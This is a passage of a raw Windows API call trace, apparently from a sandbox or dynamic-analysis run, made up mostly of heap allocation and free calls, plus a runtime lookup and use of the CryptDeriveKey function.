lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0190.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0190.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0190.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0190.230] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0190.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0190.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0190.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0190.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0190.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0190.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0190.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0190.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0190.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0190.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0190.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0190.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0190.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0190.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0190.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0190.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0190.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0190.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0190.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x34aa748, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0190.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0190.232] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0190.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0190.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0190.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0190.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0190.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0190.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0110 [0190.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0190.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0150 [0190.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0190.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0190.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0190.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0190.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0190.233] CryptDeriveKey (in: hProv=0xaa3868, Algid=0x6601, hBaseData=0xaa5860, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa58a0) returned 1 [0190.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0190.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0190.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0150 [0190.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0190.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0190.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0190.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0190.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0190.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0190.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0190.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0190.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0190.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0190.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0190.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0190.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0190.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0190.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0190.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0190.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0190.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0190.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0190.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0190.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0190.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0190.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0190.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0190.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0190.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0190.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0190.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0190.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0190.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0190.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0190.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0190.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0190.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0190.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0190.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0190.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0190.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0190.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0190.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0190.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0190.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0190.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0190.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0190.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0190.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0190.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0190.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0190.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0190.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0190.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0190.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0190.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0190.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0190.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0190.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0190.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0190.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0190.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0190.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0190.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0190.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0190.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0190.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0190.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0190.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0190.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0190.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0190.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0190.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0190.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0190.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0190.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0190.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0190.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0190.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0190.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0190.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0190.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0190.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0190.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0190.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0190.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0190.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0190.238] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0190.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0190.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0190.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0190.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0190.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0190.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0190.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0190.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0190.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0190.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0190.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0190.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0190.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0190.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0190.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0190.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0190.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0190.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0190.239] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0190.239] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0190.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0190.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0190.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0190.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0190.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0190.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0190.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0190.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0190.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0190.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0190.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0190.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0190.239] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0190.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0190.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0190.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0190.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0190.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0190.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0190.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0190.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0190.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0190.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0190.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0190.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0190.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0190.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0190.240] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0190.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0190.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0190.240] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0190.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0190.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0190.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0190.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0190.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0190.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0190.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0190.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0190.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0190.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0190.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0190.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0190.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0190.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0190.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa520 [0190.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa658 [0190.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5c8 [0190.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0190.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2b0 [0190.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0190.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0190.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa688 [0190.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa628 [0190.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa490 [0190.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0190.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6e8 [0190.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0190.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0190.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa580 [0190.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0190.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa430 [0190.242] RtlAllocateHeap (HeapHandle=0x25c0000, 